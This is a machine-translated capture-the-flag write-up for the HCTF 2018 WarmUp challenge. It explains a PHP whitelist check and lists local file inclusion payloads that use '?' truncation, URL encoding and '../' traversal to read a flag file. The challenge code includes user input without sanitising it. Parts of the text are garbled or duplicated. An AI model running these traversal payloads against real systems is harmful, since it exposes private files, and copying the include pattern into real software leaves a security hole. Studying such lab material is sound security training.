BUUCTF[HCTF 2018]WarmUp

As soon as I go in, I see ：

Directly view the page source code , notice ：[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-ZAHHvF5K-1650035641957)(https://s2.loli.net/2022/04/15/dw1EaQytsnb5xqI.png)]

thus , We know that there is one source.php

therefore , Try adding... Directly after the link /source.php, Get the source code ：

So we can analyze the code ：

The entrance is below if In the sentence , Let's analyze the code ：

You can see if There are three conditions ：

1. The first is for file Sentenced to empty

2. Then there is the need to determine file For the string

3. It's using checkFile To detect the incoming string （checkFile The body of the function is in the code above ）

Then let's analyze the above checkFile Code for ：

Let's first introduce the main functions ：

• in_array() Matches the specified value within the array
• mb_substr() Returns the specified value from the string （substr() For English characters only , If you need to split Chinese characters, you need mb_substr()), Close left and open right, for example mb_substr(0,2) obtain 0,1 Bit character
• mb_strpos() Returns the first occurrence of a character in an array

<?php
  highlight_file(__FILE__);
  class emmm
  {
    public static function checkFile(&$page)
    {
      $whitelist = ["source"=>"source.php","hint"=>"hint.php"];  \\ Create a white list , There are only two objects in the slogan in the white list 
      if (! isset($page) || !is_string($page)) {
        echo "you can't see it";
        return false;
      }

​      if (in_array($page, $whitelist)) {  \\ Here is for the incoming page Compare it with what's on the white list , Be careful ： Here we need these two to be exactly the same , So let's go back here true It's obviously unrealistic .
​        return true;
​      }

​      $_page = mb_substr(
​        $page,
​        0,
​        mb_strpos($page . '?', '?')  \\  This is right page To deal with , about page Splicing ？ Search the string to find ？ Where is it 
​      );\\ Yes page Slice , Slice from 0 Start to mb_strpos() The location of the mark , for example ？flie=1235456？asdfg, Then the processing result is page=123456
​      if (in_array($_page, $whitelist)) { \\ After processing , Compare the result with the white list again , If consistent, return true
​        return true;
​      }

​      $_page = urldecode($page); \\ This is right url To decode , Prevent the use of url Code bypass 
​      $_page = mb_substr(  \\ Again, process the incoming string as before 
​        $_page,
​        0,
​        mb_strpos($_page . '?', '?')
​      );
​      if (in_array($_page, $whitelist)) {
​        return true;
​      }
​      echo "you can't see it";
​      return false;
​    }
  }

  if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
  ) {
    include $_REQUEST['file'];
    exit;
  } else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
  } 
?>

From the above analysis, we can see the feasible return true There are two ways （ But the two are basically the same ）：

1. Let the second return true establish
2. Yes url Encoding , Make the third return true establish

good , So you can get through checkFile Detection of , Then here we have to consider how we can pass include Method to open our file , Consider using local include , Here is a simple concept ：

In the basic LFI In attack , We can use （../） Or simply （/） Read the contents of the file directly from the directory

Then we can look at it layer by layer flag file

1. Method 1 （ Corresponding to the above method 1）

?file=source.php?../ffffllllaaaagggg
?file=source.php?../../ffffllllaaaagggg
?file=source.php?../../../ffffllllaaaagggg
?file=source.php?../../../../ffffllllaaaagggg
?file=source.php?../../../../../ffffllllaaaagggg

2. Method 2

?file=source.php%3f/../../../../ffffllllaaaagggg

/…/…/…/ffffllllaaaagggg

2. Method 2 

```php+HTML
?file=source.php%3f/../../../../ffffllllaaaagggg

finally , After going up five floors, we found flag: